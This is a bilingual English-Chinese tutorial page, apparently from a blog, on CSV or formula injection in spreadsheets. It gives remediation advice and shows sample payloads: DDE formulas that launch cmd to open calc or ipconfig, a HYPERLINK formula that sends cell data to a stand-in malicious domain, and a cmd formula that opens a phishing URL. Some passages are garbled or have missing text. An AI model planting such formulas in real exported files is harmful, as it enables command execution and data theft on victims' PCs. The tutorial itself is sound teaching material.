赞
踩
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.
When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:
CSV注入,也称为公式注入,发生在网站在CSV文件中嵌入不可信输入时。当使用电子表格程序(如Microsoft Excel或LibreOffice Calc)打开CSV时,所有以=开头的单元格都会被软件解释为一个公式。恶意构造的公式可以用于以下三种关键攻击。
This attack is difficult to mitigate, and explicitly disallowed from quite a few bug bounty programs. To remediate it, ensure that no cells begin with any of the following characters:
这种攻击很难减轻,而且很多bug赏金计划都明确禁止这种攻击。要解决这个问题,请确保单元格不以以下字符开头:
Keep in mind that it is not sufficient to make sure that the untrusted user input does not start with these characters. You also need to take care of the field separator (e.g., ‘,’, or ‘;’) and quotes (e.g., ', or "), as attackers could use this to start a new cell and then have the dangerous character in the middle of the user input, but at the beginning of a cell.
请记住,仅确保不受信任的用户输入不以这些字符开头是不够的。你还需要注意字段分隔符(例如,‘、‘或’;’)和引号(例如,‘或’ '),因为攻击者可能会使用它来启动一个新单元格,然后将危险字符放在用户输入的中间,但在单元格的开头。
Alternatively, apply the following sanitization to each field of the CSV, so that their content will be read as text by the spreadsheet editor:
或者,对CSV的每个字段应用以下过滤,以便电子表格编辑器将它们的内容读取为文本:
Create an xls file and enter =1+1 in a cell, and you should see that the value changes to 2, indicating that the plus sign was performed as an operation.
创建一个xls文件,在单元格中输入=1+1,回车后可以看到值变成了2,说明加号被当做运算执行了。
Of course, it’s not just the + sign that performs arithmetic; symbols like =, -, and @ are also interpreted as formulas in excel.
当然,不止是+号能执行运算,=、-、@ 这样的符号也会被excel解析为公式。
DDE(Dynamic Data Exchange)
DDE is an inter-process communication protocol under Windows, which is a dynamic data exchange mechanism. Using DDE communication requires two Windows applications, one of which processes information as a server, and the other gets information from the server as a client. DDE supports Microsoft Excel, LibreOffice, and Apache OpenOffice. Excel, Word, Rtf, Outlook can all use this mechanism to update content based on the results of external applications. So if we make a CSV file containing the DDE formula, Excel tries to execute an external application when opening that file.
DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,其中一个作为服务器处理信息,另外一个作为客户机从服务器获得信息。DDE支持Microsoft Excel,LibreOffice和Apache OpenOffice。 Excel、Word、Rtf、Outlook都 可以使用这种机制,根据外部应用的处理结果来更新内容。因此,如果我们制作包含DDE公式的CSV文件,那么在打开该文件时,Excel就会尝试执行外部应用。
For example, if we construct a csv or xls file containing the following string:
比如我们构造包含如下字符串的csv或xls文件:
=cmd | ‘/ C calc’ !A0
Excel will try to invoke the native CMD command with a friendly prompt if the user unconsciously clicks yes:
Excel会尝试调用本机CMD命令,给出友好提示,若用户在无意识状态下点击“是”:
It then tries to accept the typo correction; if it does not accept the correction, it will execute cmd
而后尝试接受更正拼写错误,不接受更正则会执行cmd命令
The business system accepts user input and exports it as csv=> The malicious user enters the payload through the interface. The victim downloads the file and runs it on the PC. The victim’s PC is attacked. Therefore, DDE injection attack is an attack where the source of attack comes from a website, but the final target is a normal user’s PC.
业务系统接受用户输入并导出为csv=>恶意用户通过界面输入payload=>受害者下载文件并在PC运行=>受害者PC被攻击。因此DDE注入攻击是一种攻击源来自网站,但最终目标是普通用户PC的一种攻击。
OS command execution
OS命令执行
OS arbitrary command execution is one of the main hazards, as mentioned above, you can use the CMD = | 'calc/C! A0 play calculator or using CMD = | 'ipconfig/k! A0 pops the ipconfig command to detect whether the vulnerability exists. Analogically to XSS, if the system can implement alert (1), it means that we can execute arbitrary js code, depending on how we use it. For example:
OS任意命令执行是最主要的危害,像上面讲过的,可以使用= cmd | ‘/ C calc’ !A0弹计算器或者使用=cmd|‘/k ipconfig’!A0弹出ipconfig命令的方式探测漏洞是否存在。类比XSS的利用思路,如果系统可以实现alert(1)弹框效果,说明我们可以执行任意的js代码,这取决于我们的利用思路。比如:
Information leakage
信息泄露
The Hyperlink function creates a shortcut and makes a jump. When a cell containing the HYPERLINK function is clicked, Microsoft Excel opens a file stored in link_location, such as:
超链接功能 Hyperlink创建快捷方式并进行跳转,单击包含HYPERLINK函数的单元格时,Microsoft Excel将打开存储在link_location的文件,如:
You can set one of the table cells to the following:
可将表格其中一个单元格设置为以下形式:
=HYPERLINK(“https://maliciousDomain.com/evil.html?data=”&A1,“Click to view additional information”)”
A cell is created that displays the text “Click to see additional information,” and when the user clicks, the data in A1 is sent to maliciousDomain.com, causing the information to be leaked. Of course, this attack can also be achieved using the first attack method, as follows:
将创建一个单元格,显示文本“单击以查看其他信息”,当用户单击,将发送A1中的数据到maliciousDomain.com,从而导致信息泄露。当然使用第一种攻击方式也可以实现这种攻击效果,如:
=6-5 cmd|’ /C “C:\Program Files\InternetExplorer\iexplore.exe” http:///asd.html’!A0
It directs the user to a phishing website to steal hashes and passwords.
它将用户定向到恶意钓鱼网站,实现窃取哈希值和口令等操作。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。